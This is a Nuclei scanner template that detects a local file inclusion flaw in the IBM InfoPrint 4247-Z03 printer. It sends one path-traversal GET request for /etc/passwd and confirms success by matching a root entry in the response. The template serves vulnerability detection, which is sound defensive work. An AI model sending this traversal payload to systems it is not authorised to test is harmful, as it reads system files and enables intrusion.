id: ibm-infoprint-lfi

info:
  name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Local File Inclusion
  author: harshbothra_
  severity: high
  description: IBM InfoPrint 4247-Z03 Impact Matrix Printer is subject to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/47835
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: matrix,printer,edb,ibm,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/./../../../../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# digest: 490a0046304402203b183a1ad6d716baf32efa3082e6196507d7ba10be579ea9c2d4d3fb79a3208c0220148abe272004e5444792cf59e6be2882cbf7cf8b531b1f57d118a64d810370cd:922c64590222798bb761d5b6d8e72950
